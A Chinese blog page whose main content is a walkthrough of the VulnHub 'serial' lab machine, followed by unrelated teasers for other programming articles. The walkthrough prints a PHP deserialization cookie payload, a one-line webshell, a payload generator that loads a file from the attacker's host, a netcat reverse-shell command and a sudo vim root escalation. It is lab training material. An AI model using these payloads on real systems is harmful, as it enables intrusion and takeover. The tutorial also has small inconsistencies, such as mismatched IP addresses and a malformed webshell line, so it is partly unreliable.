当前位置：首页 > news >正文

serial靶机教程

news 2026/4/10 9:59:22

靶机下载地址

https://download.vulnhub.com/serial/serial.zip

主机发现

arp-scan -l

端口扫描

nmap 192.168.229.131 -A

根据对⽐可知serial的⼀个ip地址为192.168.47.143

该靶机开启了22端⼝和80端⼝

对⽹站进⾏⼀个访问，⼤概意思为这是对新的cookie处理程序的测试版暂且搁置

目录扫描

dirb http://192.168.229.131

访问网站

发现⼀个zip⽂件

解压查看

index.php⽂件中包含user.class.php⽂件且对cookie中的user参数进⾏了序列化和base64编码

user.class.php⽂件包含log.class.php⽂件且定义了Welcome和User两个类并调⽤了

log.class.php⽂件中的handler函数

log.class.php定义了Log类和成员变量type_log且handler函数对变量进⾏了⽂件包含和输出

没有得到有用的信息

访问原⽹站,⽤Burpsuite抓包查看cookie

发现其为base64编码，对其进行解码

O:4:"User":2:{s:10:".User.name";s:3:"sk4";s:9:".User.wel";O:7:"Welcome":0:{}}7.

构造payload，尝试读取passwd⽂件

O:4:"User":2:{s:10:" User name";s:5:"admin";s:9:" User wel";O:3:"Log":1:{s:
8:"type_log";s:11:"/etc/passwd";}}

使⽤base64编码

Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IgBVc2VyAHd
lbCI7TzozOiJMb2ciOjE6e3M6MTM6IgBMb2cAdHlwZV9sb2ciO3M6MTE6Ii9ldGMvcGFzc3dkIj
t9fQ==

获取shell

在本机写一个txt

<?php system($_GET['cmd'];?>

在创建一个木马文件

<?phpclass Log {private $type_log = "http://本机ip/1.txt";}class User {private $name = "admin";private $wel;function __construct() {$this->wel = new Log();}
}
$obj = new User();
echo base64_encode(serialize($obj));

访问php文件

在kali开启一个监听

反弹shell

?cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.229.132
+8888+>/tmp/f

反弹成功

提权

查看系统版本，内核版本

切换到根目录

cd /
ls

查看文件

cat credentials.txt.bak

使用远程连接使用之前扫出来的21端口

ssh sk4@192.168.229.131

尝试进入root

用sudo vim，进⼊到命令模式输⼊!bash

以下则是提权成功

serial靶机教程

靶机下载地址 https://download.vulnhub.com/serial/serial.zip 主机发现 arp-scan -l 端口扫描 nmap 192.168.229.131 -A 根据对⽐可知serial的⼀个ip地址为192.168.47.143 该靶机开启了22端⼝和80端⼝对⽹站进⾏⼀个访问，⼤概意思为这是对新的cookie处理程序…...

编程日记 2024/8/7 4:56:29

【Linux-MISC设备】

目录 1. MISC设备2. MISC蜂鸣器实验 1. MISC设备 MISC设备的主设备号为10.MISC设备会自动创建cdev，不需要再手动创建。MISC设备是基于platform的. MISC驱动的编写的核心就是初始化miscdevice结构体变量，然后用misc_register函数向内核注册，…...

编程日记 2024/8/7 4:54:27

【随笔】VRRP+MSTP

虚拟路由冗余协议（Virtual Router Redundancy Protocol，VRRP） 设计采用主备模式，将VRRP组内多个路由设备都映射为一个虚拟路由设备。一个VRRP组中只能由一台处于主控角色的路由器，可以有一个或多个备份角色的路由器。…...

编程日记 2024/8/7 4:53:26

vue 动态增删行，并form表单校验（附v2\v3）

Vue3 组件用的 ant 可以换成你们用，主要是form校验前端代码 <a-formref"formRef":model"formData":label-col-props"{ span: 5 }":wrapper-col-props"{ span: 17 }"><a-row><a-form-itemlabel"角色…...

编程日记 2024/8/7 4:52:25

计算机网络的基本概念

IP地址（Internet Protocol Address）是指在计算机网络中每个设备的唯一标识符。它用于区分不同设备并在网络中进行数据包的路由。我们平常所使用的IP地址主要版本： IPv4 格式: 由四个整数（0到255）组成，以点…...

编程日记 2024/8/7 4:51:24

Python 爬虫项目实战三：GitHub 用户信息抓取与分析

一、项目背景爬虫技术不仅限于获取网页内容，还可以用于获取和分析特定网站的用户信息。本文将演示如何使用Python编写爬虫程序，从GitHub网站抓取用户信息，并进行简单的数据分析。二、环境准备在开始之前，请确保你已经安装了…...

编程日记 2024/8/7 4:50:23

xtrabackup搭建MySQL 8.0 主从复制

xtrabackup搭建MySQL 8.0 主从复制安装MySQL 8.0.37安装xtrabackupGTIDs初始化从库参考：GTID概述GTID相较与传统复制的优势GTID自身存在哪些限制GTID工作原理简单介绍如何开启GTID复制GTID与传统模式建立复制时候语句的不同点传统复制GTID复制 GTID同步状态简单解析…...

编程日记 2024/8/7 4:49:22

Java程序员接单分享

作为一名Java程序员，这阵子通过承接些小型项目，我顺利跨过了月薪破万的门槛。这些项目虽小，却如同磨刀石般，让我在实战中发现了自身技术栈的棱角与不足，尤其是意识到了在Java这一浩瀚技术海洋中的诸多未知领域。我深知…...

编程日记 2024/8/7 4:48:21

【HarmonyOS NEXT星河版开发学习】小型测试案例01-今日头条置顶练习

个人主页→VON 收录专栏→鸿蒙开发小型案例总结基础语法部分会发布于github 和 gitee上面前言本系列可能是博客首发，鸿蒙开发星河版是一个全新的版本，由于参考视频较少鸿蒙开发不被重视导致csdn上面并没有全套的学习路线，…...

编程日记 2024/8/7 4:46:19

C语言----计算开机时间

计算开机时间实例说明编程实现计算开机时间，要求在每次开始计算开机时间时都能接着上次记录的结果向下记录。实现过程： 1. 在TC中创建一个C文件。 2. 引用头文件，代码如下: #include <stdio.h> 3. 定义结构体time，用来…...

编程日记 2024/8/7 4:44:18

批发行业进销存-登录适配 android 横竖屏幕源码CyberWinApp-SAAS 本地化及未来之窗行业应用跨平台架构

一、横竖屏切换的意义以下是移动端横屏竖屏可切换在进销存中的一些重要应用： a、数据录入与查看在录入商品信息、库存数量等大量数据时，横屏模式可以提供更宽阔的输入区域，减少输入错误。例如，在输入长串的商品编码或详细的商…...

编程日记 2024/8/7 4:43:17

js功能（1）

1、readonly 应用于元素：readonly 可以应用于 <input> 和 <textarea> 元素。用户界面表现：当元素设置为 readonly 时，用户不能更改输入框中的值，但可以选中和复制文本，且表单包含该输入字段的值可以被提交…...

编程日记 2024/8/7 4:42:12

微信小程序乡村医疗系统，源码、部署+讲解

目录摘要 Abstract 1 绪论 1.1 研究背景及意义 1.2 研究现状 1.3 研究内容 2 相关技术介绍 2.1 Java 语言 2.2 MySQL 数据库 2.3 Spring Boot 框架 2.4 B/S 结构 2.5 微信小程序 3 系统分析 3.1 可行性分析 3.1.1 经济可行性 3.1.2 技术可行性…...

编程日记 2024/8/7 4:41:11

完美解决pip命令版本冲突导致对应版本模块包无法安装的问题

解决步骤使用pip更新/降低指定模块包命令格式降低pip自身至指定版本的命令再次换源安装指定模块包在对 FasterNet 这篇论文源码复现过程中，我们首先需要安装相关依赖文件（ path/to/your/requirements.txt） -extra-index-url https://down…...

编程日记 2024/8/7 4:40:10

5.1-软件工程基础知识-软件工程概述

软件工程诞生原因了解早期的软件：主要是指采用个体工作方式实现的程序。第一次软件危机：20世纪60年代中期典型表现有软件质量低下、项目无法如期完成、项目严重超支等因为软件而导致的重大事故时有发生。软件工程的诞生：1968年在NATO会…...

编程日记 2024/8/7 4:39:09

极简聊天室-websocket版

再写一个极简聊天室的websocket版，在本例中，websocket仅用于服务器向客户端传输信息，客户端向服务器发送信息是传统的http post方式，用axios来实现的，当然websocket本身是支持双向通信，主要是为了方便跟前面…...

编程日记 2024/8/7 4:36:06

QT学生管理系统开发文档

目录第一章 UI界面设计与开发登录界面主界面 UI美化第二章数据库设计与开发数据库设计连接数据库数据库功能设计 sql语句设计查询所有学生数量查询第几页学生数据删除学生修改学生信息清空学生表添加单个用户删除单个用户修改用户权限查询所有用户…...

编程日记 2024/8/7 4:35:05

【五大海内外高校支持】2024年数字经济与计算机科学国际学术会议（DECS2024）

大会官网：www.icdecs.net 大会时间：2024年9月20-22日大会地点：中国-厦门截稿日期：详情见官网支持单位马来西亚理工大学北京科技大学经济管理学院南京信息工程大学马来西亚敦胡先翁大学大会嘉宾大会主席罗航…...

编程日记 2024/8/7 4:34:03

VS项目打包成lib库并使用

一、新建一个静态库项目一般要把项目设为Release模式二、添加文件将所需要打包的头文件、源文件添加到该静态库项目中三、生成项目生成成功后即可在Release文件夹出现找到相应的.lib文件四、使用静态库将静态库文件复制到项目文件夹中，然后在项目属性设…...

编程日记 2024/8/7 4:32:00

社交巨头与去中心化：解析Facebook在区块链的角色

区块链技术的兴起为多个行业带来了变革，而社交平台也正在经历这一波技术浪潮。作为全球最大的社交网络之一，Facebook（现名Meta Platforms）在区块链领域的探索展示了其如何应对去中心化趋势的挑战，并利用这一技术推动自…...

编程日记 2024/8/7 4:29:59

Next 26: 一场定义未来的云端与 AI 盛宴，即将开启！

以下文章来源于谷歌云服务，作者 Google Cloud左右滑动查看更多点击屏末 | 阅读原文 | 直达官网...

编程新知 2026/4/10 9:49:13

植物大战僵尸终极辅助工具：PVZ Toolkit完全指南，免费解锁无限阳光与全功能

植物大战僵尸终极辅助工具：PVZ Toolkit完全指南，免费解锁无限阳光与全功能【免费下载链接】pvztoolkit 植物大战僵尸 PC 版综合修改器项目地址: https://gitcode.com/gh_mirrors/pv/pvztoolkit 你是否曾经在《植物大战僵尸》中被无尽的僵尸浪潮…...

编程新知 2026/4/10 9:45:08

CSS如何控制全屏显示的元素样式

全屏元素应设display: block或flex、position: fixed并绑定top/left/width/height，:fullscreen中显式声明box-sizing: border-box，移动端优先用webkit-playsinline模拟全屏。全屏元素的display和position怎么设才不“飘”全屏显示的元素（比如…...

编程新知 2026/4/10 9:35:54

如何从 iCloud 还原照片？6 种方法成功解决

丢失珍贵的照片可能会令人心碎。幸好，有了 iCloud 这样的服务，恢复照片就变得相对简单了。iCloud 是 Apple 的云存储服务，它允许用户安全地备份照片和其他数据，确保珍贵的回忆永不丢失。在本文中，我们将指导您完成从 i…...

编程新知 2026/4/10 9:15:23

企业级文档翻译离线部署终极指南：BabelDOC本地化实战深度解析

企业级文档翻译离线部署终极指南：BabelDOC本地化实战深度解析【免费下载链接】BabelDOC Yet Another Document Translator 项目地址: https://gitcode.com/GitHub_Trending/ba/BabelDOC 在当今全球化业务环境中，企业面临着海量技术文档、研究报告…...

编程新知 2026/4/10 9:09:14